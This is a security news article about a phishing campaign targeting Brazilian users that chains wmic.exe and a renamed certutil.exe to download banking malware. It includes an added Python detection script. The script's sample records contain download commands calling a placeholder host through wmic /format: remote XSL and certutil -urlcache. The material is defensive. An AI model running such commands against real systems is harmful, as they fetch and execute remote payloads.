Malware abusing legitimate Windows files found targeting Brazilian users in new phishing campaign
A recently discovered malware abuses two legitimate Windows command-line utilities: wmic.exe, the Windows Management Instrumentation command-line tool, and certutil.exe, the certificate services utility. The malware leverages both to download its payload onto the victim's device. Because each tool can fetch files from a remote location as part of its normal feature set, the malware author can chain them to retrieve further files for malicious purposes without shipping a custom downloader.
Each of these utilities has previously been abused on its own in multiple campaigns. In this case, however, the malware author uses them together to make the attack more effective and harder to detect.
Security researchers from Trend Micro, who uncovered the campaign, also found that the malware has been targeting Brazilian victims.
The threat actors behind this campaign send phishing emails with links that lead to a ZIP archive. When extracted, the archive contains an LNK shortcut file (detected as Trojan.LNK.DLOADR.AUSUJM) that launches cmd.exe. cmd.exe in turn invokes wmic.exe to download and execute script commands from the command-and-control (C2) server.
cmd.exe then copies certutil.exe into the temp folder under the name certis.exe. The malicious script retrieved from the C2 server uses this renamed certis.exe to download the main payload from the C2 servers.
“This step in the routine is most likely performed as an additional evasion technique since, as mentioned earlier, the use of certutil.exe in malicious attacks is already publicly known,” Trend Micro researchers wrote in a blog post.
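Renaming certutil.exe defeats detections that key only on the process name, but the copy still carries the original binary's embedded OriginalFileName, and the download syntax it must be given does not change. The script below is an added example (not Trend Micro's code or anything from the article) of detection logic for the chain described above, run over constructed process-creation records modelled on Sysmon Event ID 1 fields. The command lines, paths and the example.invalid host are assumptions illustrating the documented wmic.exe /format: and certutil.exe -urlcache abuse patterns; the article does not quote the campaign's actual commands.

```python
"""Flag the wmic.exe -> renamed certutil.exe download chain in process-creation logs.

Added example; the records below are constructed, not from the campaign.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str               # on-disk path of the new process
    original_file_name: str  # OriginalFileName from the PE version resource
    command_line: str
    parent_image: str


URL_RE = re.compile(r"https?://", re.IGNORECASE)


def _basename(path):
    """Return the lowercase file name from a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def is_wmic_remote_script(ev):
    """wmic.exe told to render output with a stylesheet fetched from a URL.

    The /format: switch accepts a remote XSL file, and WMIC will execute
    script embedded in it, which is how wmic.exe can pull and run commands
    from a C2 server without touching disk first.
    """
    if _basename(ev.image) != "wmic.exe":
        return False
    cl = ev.command_line.lower()
    return "/format:" in cl and bool(URL_RE.search(cl))


def is_renamed_certutil(ev):
    """A certutil binary running under another name (e.g. certis.exe),
    or any certutil invoked with the -urlcache download switch and a URL.

    The rename check relies on the PE version resource surviving the copy;
    an attacker who strips it would evade this particular rule.
    """
    if ev.original_file_name.lower() != "certutil.exe":
        return False
    cl = ev.command_line.lower()
    renamed = _basename(ev.image) != "certutil.exe"
    downloading = "-urlcache" in cl and bool(URL_RE.search(cl))
    return renamed or downloading


def triage(events):
    """Return (rule, parent process, command line) for every suspicious event."""
    findings = []
    for ev in events:
        if is_wmic_remote_script(ev):
            findings.append(("wmic-remote-script", ev.parent_image, ev.command_line))
        if is_renamed_certutil(ev):
            findings.append(("renamed-or-downloading-certutil", ev.parent_image, ev.command_line))
    return findings


# Constructed sample records (assumed paths and hostnames, not real telemetry).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\wbem\wmic.exe", "wmic.exe",
                 "wmic os get caption", r"C:\Windows\System32\cmd.exe"),          # benign
    ProcessEvent(r"C:\Windows\System32\wbem\wmic.exe", "wmic.exe",
                 'wmic os get /format:"http://example.invalid/run.xsl"',
                 r"C:\Windows\System32\cmd.exe"),                                   # remote XSL
    ProcessEvent(r"C:\Users\victim\AppData\Local\Temp\certis.exe", "CertUtil.exe",
                 "certis.exe -urlcache -split -f http://example.invalid/p.exe p.exe",
                 r"C:\Windows\System32\cmd.exe"),                                   # renamed copy
    ProcessEvent(r"C:\Windows\System32\certutil.exe", "CertUtil.exe",
                 "certutil -verify cert.cer", r"C:\Windows\System32\cmd.exe"),     # benign
    ProcessEvent(r"C:\Windows\System32\notepad.exe", "NOTEPAD.EXE",
                 "notepad.exe notes.txt", r"C:\Windows\explorer.exe"),             # unrelated
]

if __name__ == "__main__":
    for rule, parent, cmd in triage(SAMPLE_EVENTS):
        print(f"{rule}: parent={parent} cmd={cmd}")
```

Both rules are deliberately narrow. A legitimate wmic.exe query that formats locally is not flagged, and a certutil.exe that verifies a certificate is not flagged, so the logic separates the normal use of these tools from the download abuse the article describes. Because the rename check depends on the version resource in the copied file, pairing it with a hash match against the known certutil.exe binaries on the host is the more robust production approach.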
Phishing campaign targets Brazil
The phishing emails used in the campaign pose as coming from the company that operates Brazil's national postal service, using a courier delivery notice as the lure.
Trend Micro researchers found that the final payload delivered in this campaign is banking malware that activates only when the target system's language is set to Portuguese. This indicates that the cybercriminals behind the campaign are specifically targeting Portuguese-speaking users.
Defending against the attack
Cybercriminals tend to use legitimate files to add evasion layers to their attacks, which makes it hard for security products to distinguish legitimate use of these applications from malicious use. Researchers suggest that users take precautions such as double-checking the identity of the email sender, checking the email for grammatical or spelling errors, and not downloading files from unknown links.